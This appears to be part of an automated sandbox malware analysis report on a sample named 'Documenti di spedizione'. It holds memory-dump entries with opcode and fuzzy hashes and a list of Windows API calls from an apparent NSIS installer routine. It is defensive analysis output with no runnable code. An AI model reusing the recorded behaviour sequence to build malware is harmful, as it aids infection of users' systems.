                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @13t1313
                                                  • API String ID: 0-3111218807
                                                  • Opcode ID: bfd78a4ad1df3f2e13236b01a41a7f273c0ae11e9abedf96b12f07294aa800a5
                                                  • Instruction ID: 995e5000c47e1bfd1a81cbed04d081409ad02da1b3a10bd695897512078e7baa
                                                  • Opcode Fuzzy Hash: bfd78a4ad1df3f2e13236b01a41a7f273c0ae11e9abedf96b12f07294aa800a5
                                                  • Instruction Fuzzy Hash: 33816B34F002098FEB05EFA9D55579EBBF6EF89340F218529D80AEB344DA75DC428B91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `<;6
                                                  • API String ID: 0-3290123850
                                                  • Opcode ID: d9b7908d3dcd44eb7fc23c8ee86c2a86891a86809d2c32ca40ff7f246cf17abe
                                                  • Instruction ID: a51aa8de66d392c787b3e29d481c20f67e2aa126649afa1b24a49ce409e3bb0a
                                                  • Opcode Fuzzy Hash: d9b7908d3dcd44eb7fc23c8ee86c2a86891a86809d2c32ca40ff7f246cf17abe
                                                  • Instruction Fuzzy Hash: 38914F34E106198BEB11DF68C890B8DB7B1FF89310F208699D549BB345DB71AA86CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `<;6
                                                  • API String ID: 0-3290123850
                                                  • Opcode ID: 2c3c28a86e35ae0ad7bf20a6315ed3916fee630f53f174c1b6b80ff4699ccc4f
                                                  • Instruction ID: 427d0e76f7fdb78d9ccfdb13755f6dcd08507223f43ab93ea00a30fa714cb3d0
                                                  • Opcode Fuzzy Hash: 2c3c28a86e35ae0ad7bf20a6315ed3916fee630f53f174c1b6b80ff4699ccc4f
                                                  • Instruction Fuzzy Hash: E7914E34E10619CBEB15DF68C890B8DB7B1FF89310F208699D549BB345DB71AA86CF90
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b1db7548037555d1d687f959909a75d38de167483ff03d138b829e80aa64a1a
                                                  • Instruction ID: e33f08339d588387f98abcb1ee53bc0e3f002322d4fc6d437ba6c8ed9f5a5ecc
                                                  • Opcode Fuzzy Hash: 3b1db7548037555d1d687f959909a75d38de167483ff03d138b829e80aa64a1a
                                                  • Instruction Fuzzy Hash: 9A61C775F101214FEB06AA7EC844A5EBAD7AFC4260F25403AD80AD73A0DEB5ED0287D5
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f6ed28501910ba1ab0a0d7427d98a7be00b7753bdc05fb429b20606ce89b2ce7
                                                  • Instruction ID: 6d65b033991c71df56fb977f2187f48169bd6ecfcfa0b4a8af67e1a0bbc13317
                                                  • Opcode Fuzzy Hash: f6ed28501910ba1ab0a0d7427d98a7be00b7753bdc05fb429b20606ce89b2ce7
                                                  • Instruction Fuzzy Hash: 6C711974E002099FEB15EBA9C981A9DBBF6FF88300F648529D409EB355DB30ED46CB51
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b5979b550a5bc127d0563b4272ddc661e58d05bb4c4f10e057d8aa6a3b37ff7c
                                                  • Instruction ID: 372b25b5fc0999c6bb79c82a86b382db5359ec70ebf4abc2676ea7a78673b2f8
                                                  • Opcode Fuzzy Hash: b5979b550a5bc127d0563b4272ddc661e58d05bb4c4f10e057d8aa6a3b37ff7c
                                                  • Instruction Fuzzy Hash: E9711B74E002098FEB05EBA9C981A9DBBF6FF88300F648529D409EB355DB30ED46CB51
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d0d84d6a99bf3e8dbff538a62806d9928984e20fb37510c02641a19cbfa06389
                                                  • Instruction ID: 2e24af279087e26b71eb58abe3cbb4f71071e5256bda10f80e183591ba5803cf
                                                  • Opcode Fuzzy Hash: d0d84d6a99bf3e8dbff538a62806d9928984e20fb37510c02641a19cbfa06389
                                                  • Instruction Fuzzy Hash: 42514E34F002058FEF55DB69C951BAE77F6EFC9640F50846AC80AAB384EE31DC428B95
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ab7e5544e49434de370b9969aa0f5c04ec8b84935f78fc89c7e6033a2aafa48
                                                  • Instruction ID: 9dc9066c6bd1cac9b5dfa4e56277785326a1bffb5cc37f76ee6f0e8f831d4a9f
                                                  • Opcode Fuzzy Hash: 7ab7e5544e49434de370b9969aa0f5c04ec8b84935f78fc89c7e6033a2aafa48
                                                  • Instruction Fuzzy Hash: 9151B075E00205DFFB56EBA8E4856ADBBB2EFC4311F20896AD106E7351DB358C46CB80
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08647df8c1637225df26819c013018ec2b23b9c7711bb9e6ff465123245a5d60
                                                  • Instruction ID: 12d4d35ca014fd238742b8f788b7020a90688c9fe826121a654d454326557b72
                                                  • Opcode Fuzzy Hash: 08647df8c1637225df26819c013018ec2b23b9c7711bb9e6ff465123245a5d60
                                                  • Instruction Fuzzy Hash: E6518334F20214CBFB5666BDC85576F3A5ADBCA390F30442AE50AE73D2CD69CC4247A2
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 023449bb6d0d2a2e492953bf58233b8fdf15ec6483c12b97dcc41c17c621be38
                                                  • Instruction ID: 28b532b102600476eee04b491bd1fb3d4dde39e5ff26b6f5b9457857f88fe40a
                                                  • Opcode Fuzzy Hash: 023449bb6d0d2a2e492953bf58233b8fdf15ec6483c12b97dcc41c17c621be38
                                                  • Instruction Fuzzy Hash: F0417275E006058FEF26DF99D8816AFFBB2EB85310F20492AD14AD7654C630E945CB91
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e02b14e43976229c4616c03a752896a312120f741660fb2121cc5bb809f9494b
                                                  • Instruction ID: f1ee319088b141e2df2c5e33a3ec247dfdbb651e26e0b1586c5a0f4a055430ff
                                                  • Opcode Fuzzy Hash: e02b14e43976229c4616c03a752896a312120f741660fb2121cc5bb809f9494b
                                                  • Instruction Fuzzy Hash: 9F418E70E0024ADFFB06EFA5C84569EBFB2BF85340F21452AE405EB341EB719846CB80
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0841831b7d9b611e3001889bf394d3e55ba1fb94aa5228b2226e8d67f2f983e8
                                                  • Instruction ID: 460820adbeedf174061d9c573987b88f5b6811748bd605e5dbe9d5954355176e
                                                  • Opcode Fuzzy Hash: 0841831b7d9b611e3001889bf394d3e55ba1fb94aa5228b2226e8d67f2f983e8
                                                  • Instruction Fuzzy Hash: 2E31F234B102058FEB0AAB75C4556AF3BA2BF89650F24466CD402EB391DE35CD42CB99
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08f4944921cc28e2ca04ab5de82596144826a9a6a33f3fa7c3996f46aeaa4529
                                                  • Instruction ID: 8b3a72959de355883b902b4807106653d4f5ea95a52d3e21948c6ab52ec0cfc4
                                                  • Opcode Fuzzy Hash: 08f4944921cc28e2ca04ab5de82596144826a9a6a33f3fa7c3996f46aeaa4529
                                                  • Instruction Fuzzy Hash: 3C31AD34B102068FEB0AAB75C5567AF7AA6BFC9640F24456CD402EB391DE35CD02CB99
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 229a4b07e0a743079be69b793f20a522e6d655143529679d3ef9c2070ce3a218
                                                  • Instruction ID: 271a7e8eb1abe2c0aca191820704884980ced8bd1c359fa96a95f17a5fd81a23
                                                  • Opcode Fuzzy Hash: 229a4b07e0a743079be69b793f20a522e6d655143529679d3ef9c2070ce3a218
                                                  • Instruction Fuzzy Hash: 81218D75F002159FEF12DF69C980BAEBBF5EB49B10F14402AE905E7390E735D9428B94
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d5a879abbe8c2ed95b35a64cfa71dbefefafc0119e0bcb53c8103e0409aa7862
                                                  • Instruction ID: a4819533c6b5b1f4de5c0ed3eb9e4f69eeb660bc536262899dcce5aa4ab8ac0a
                                                  • Opcode Fuzzy Hash: d5a879abbe8c2ed95b35a64cfa71dbefefafc0119e0bcb53c8103e0409aa7862
                                                  • Instruction Fuzzy Hash: FF219F75F003159FEB02DF6AC981AADBBF5EB48B10F104029E905E7340E735DD018B94
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3368750912.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_ad000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 33002539a4cb474223e20cf5c8f2896858f94e410b6788e792a2000755166bfd
                                                  • Instruction ID: 6e696f1249df007e9d8ef2a59c3a05a8b4aeb184024c590cddcc801b05ae63e6
                                                  • Opcode Fuzzy Hash: 33002539a4cb474223e20cf5c8f2896858f94e410b6788e792a2000755166bfd
                                                  • Instruction Fuzzy Hash: 592134B5604204EFCB24DF94D9C0F2ABBA1FB85314F20C56ED94A0B652C77AD847CA62
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c4012f913caab9f735f5e335e2b7412779d306a16f8251d1511de13b01961721
                                                  • Instruction ID: 11975447d4c88fc101da3b2619b957cc4f9baab615fdd4852d0109c275ea9db5
                                                  • Opcode Fuzzy Hash: c4012f913caab9f735f5e335e2b7412779d306a16f8251d1511de13b01961721
                                                  • Instruction Fuzzy Hash: 2511C016F1E3A18FF7135B3C98A16897FA1CF43250B2504EBD1C6CB293D915D90A87A2
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 23ad4c4af6b251a7f3100e6de67a56d485feec0b425c9dea473e7ab810e78549
                                                  • Instruction ID: 7a3821c4447155fe4c5625738559d41d440bed8d1eda73b7f36698ce3d171760
                                                  • Opcode Fuzzy Hash: 23ad4c4af6b251a7f3100e6de67a56d485feec0b425c9dea473e7ab810e78549
                                                  • Instruction Fuzzy Hash: F0112E35B001100FF7169A3CE81639EBBDACBC6B14F24843EE10AC7B52ED65DC4283A1
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97dad04fb7bb8f2bec1b0875aec5dce6130152ce1ef395380eb871807e201ea1
                                                  • Instruction ID: 696145d8b8c4e47bc6287021049cc1be1e642137641617f99252ba02bfa1c105
                                                  • Opcode Fuzzy Hash: 97dad04fb7bb8f2bec1b0875aec5dce6130152ce1ef395380eb871807e201ea1
                                                  • Instruction Fuzzy Hash: 8F11A536F101288BFF16DA79C8146AE73AAEBC9B50F54413AD506E7340EE35DC028790
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 05a0db2db967480fbe04673a4dca33659785db6292c35de90978b3c9e4672d91
                                                  • Instruction ID: bd36119a4e0b1d82df7a3327021c15c506b5d5339eaade91168d2518a6d11a50
                                                  • Opcode Fuzzy Hash: 05a0db2db967480fbe04673a4dca33659785db6292c35de90978b3c9e4672d91
                                                  • Instruction Fuzzy Hash: 8C01D835B101118FF726DA7DC491A5A7BE6DFC5750F304839E50ADB341DA25DC424781
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6d48786e6ab4eb1041685a708a8d5e82d67e23d5b232c9c6319a2c066eb956df
                                                  • Instruction ID: d2ca22ba4ae7a14c1775815d9f88538b3eec5d996043db69277d9906cc210efc
                                                  • Opcode Fuzzy Hash: 6d48786e6ab4eb1041685a708a8d5e82d67e23d5b232c9c6319a2c066eb956df
                                                  • Instruction Fuzzy Hash: 7421E0B5D00259AFDB00CF9AD885ACEFFB4FF49720F10812AE918A7200D375A950CBA5
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3368750912.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_ad000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d859dc89ba37c41b3ccda5ee63da4ac6bc15a9c04b0291f090dfb3f0f3c6deb
                                                  • Instruction ID: ef1eb126e469d2aec540303d07c5639fda9081c297006ca21a3c00019fc469cd
                                                  • Opcode Fuzzy Hash: 8d859dc89ba37c41b3ccda5ee63da4ac6bc15a9c04b0291f090dfb3f0f3c6deb
                                                  • Instruction Fuzzy Hash: 5011DD75504284DFCB11CF54D5C0B15FFB2FB85314F28C6AAD84A4BA56C33AD84ACB62
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 881e90d50f9ccb362939a2c6d6b1f5b3d2668a9648c2b5bf795d9c07e79545d1
                                                  • Instruction ID: 2f76203b56cb6596a16e6a79937e52f46d95d28862c74953e45456ada3690e2d
                                                  • Opcode Fuzzy Hash: 881e90d50f9ccb362939a2c6d6b1f5b3d2668a9648c2b5bf795d9c07e79545d1
                                                  • Instruction Fuzzy Hash: 7101B13AF1012847FF269A69CC157EF77AADB89A50F50003AD906E3284EE25CC038792
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ddd6ec704a4459d8ea7cc0f55a67e1f5bbb8ace788051eba0f13321bdb56f7fb
                                                  • Instruction ID: 4c9c416b6e1fa47198cfe054cdc47afb19aa50afb7e26e5922c70ca3be6abac0
                                                  • Opcode Fuzzy Hash: ddd6ec704a4459d8ea7cc0f55a67e1f5bbb8ace788051eba0f13321bdb56f7fb
                                                  • Instruction Fuzzy Hash: F211CFB5D01259AFDB00CF9AD885ACEFBB4FF49720F50812AE918A7300D374A954CBA5
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 157202eb4cbdc1d644345cf687b82bec8e9b7c3ff76b3d444b8604048c3112a8
                                                  • Instruction ID: 2121e7140d5d5a462e44055eb16c1d7b9bef09047911d9327fbe83b80afa0d38
                                                  • Opcode Fuzzy Hash: 157202eb4cbdc1d644345cf687b82bec8e9b7c3ff76b3d444b8604048c3112a8
                                                  • Instruction Fuzzy Hash: 7C01AD35B000200BF71AAA6DE41675FB6CACBC9B24F20843EE10EC7B41DD66DC4243A1
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f03447d7648cfbbc14e77c7f1e35a4b74e8ca97e071d41cedfa01f5a8431cfe0
                                                  • Instruction ID: fb22c9b46039c75612c8a06274626ec4365feb5c2f32f33f2e3f0ab534ffdc03
                                                  • Opcode Fuzzy Hash: f03447d7648cfbbc14e77c7f1e35a4b74e8ca97e071d41cedfa01f5a8431cfe0
                                                  • Instruction Fuzzy Hash: FE016935B104154BF726A66DC495B2A7BDADBC9760F308839E60FD7340EE26DC424381
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 826debfd08b0c9a41bd3542a1ef9bea1b4246c0bff7e6eb2f1e9ac8ddacae723
                                                  • Instruction ID: d3a8dd440c8d17e627d7237f2660090b03d01c10738cc5a328b31b1c3bf1c87e
                                                  • Opcode Fuzzy Hash: 826debfd08b0c9a41bd3542a1ef9bea1b4246c0bff7e6eb2f1e9ac8ddacae723
                                                  • Instruction Fuzzy Hash: F6016D35B100144FF716AA6CC456B5E77DADB8A790F208439E60FD7384EE62EC828785
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c7e80c20aee19c5111d5b664fe2e1e4cb4c88be62ecf0387ce6994bc51bfd7f1
                                                  • Instruction ID: afbf292b0729cb5b92820e6af60392da40231b9f4705b4d6d90be3c3aaa90f67
                                                  • Opcode Fuzzy Hash: c7e80c20aee19c5111d5b664fe2e1e4cb4c88be62ecf0387ce6994bc51bfd7f1
                                                  • Instruction Fuzzy Hash: EFF0A435E00311CFFF17AA49DA822A977A8EB81394F504079D904E7342DB36DD43C795
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3a03e747bc9f8def050ddc7cb686ed6aa196a6af778e2f1e5e85ff1123c3abdc
                                                  • Instruction ID: 2af0060647f41bd1c30ff3c76b607f9ead8555e46aff3dd622560eb99152828c
                                                  • Opcode Fuzzy Hash: 3a03e747bc9f8def050ddc7cb686ed6aa196a6af778e2f1e5e85ff1123c3abdc
                                                  • Instruction Fuzzy Hash: 3AF02271D09248AFFB13DF74CC562497BB8DB02240F30449BD488DB202E132CD02CB42
                                                  APIs
                                                  • SetErrorMode.KERNEL32 ref: 00403688
                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004036B3
                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036C6
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040375F
                                                  • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040379C
                                                  • OleInitialize.OLE32(00000000), ref: 004037A3
                                                  • SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037C2
                                                  • GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037D7
                                                  • CharNextW.USER32(00000000,00434000,00000020,00434000,00000000,?,00000008,0000000A,0000000C), ref: 00403810
                                                  • GetTempPathW.KERNEL32(00000400,00436800,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403948
                                                  • GetWindowsDirectoryW.KERNEL32(00436800,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                  • lstrcatW.KERNEL32(00436800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403965
                                                  • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403979
                                                  • lstrcatW.KERNEL32(00436800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403981
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403992
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,00436800,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040399A
                                                  • DeleteFileW.KERNEL32(00436000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004039AE
                                                  • lstrlenW.KERNEL32(00436800,00434000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A87
                                                    • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                  • wsprintfW.USER32 ref: 00403AE4
                                                  • GetFileAttributesW.KERNEL32(0042C800,00436800), ref: 00403B17
                                                  • DeleteFileW.KERNEL32(0042C800), ref: 00403B23
                                                  • SetCurrentDirectoryW.KERNEL32(00436800,00436800), ref: 00403B51
                                                    • Part of subcall function 00406462: MoveFileExW.KERNEL32(?,?,00000005,00405F60,?,00000000,000000F1,?,?,?,?,?), ref: 0040646C
                                                  • CopyFileW.KERNEL32(00437800,0042C800,?,00436800,00000000), ref: 00403B67
                                                    • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405CAE
                                                    • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405CBB
                                                    • Part of subcall function 004069FF: FindFirstFileW.KERNEL32(?,00425F98,00425750,004060C2,00425750,00425750,00000000,00425750,00425750, 4#v.#v,?,76232EE0,00405DCE,?,76233420,76232EE0), ref: 00406A0A
                                                    • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
                                                  • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB5
                                                  • ExitProcess.KERNEL32 ref: 00403BD2
                                                  • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BD9
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BF5
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BFC
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C11
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C34
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C59
                                                  • ExitProcess.KERNEL32 ref: 00403C7C
                                                    • Part of subcall function 00405C50: CreateDirectoryW.KERNEL32(?,00000000,00403658,00436800,00436800,00436800,00436800,00436800,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
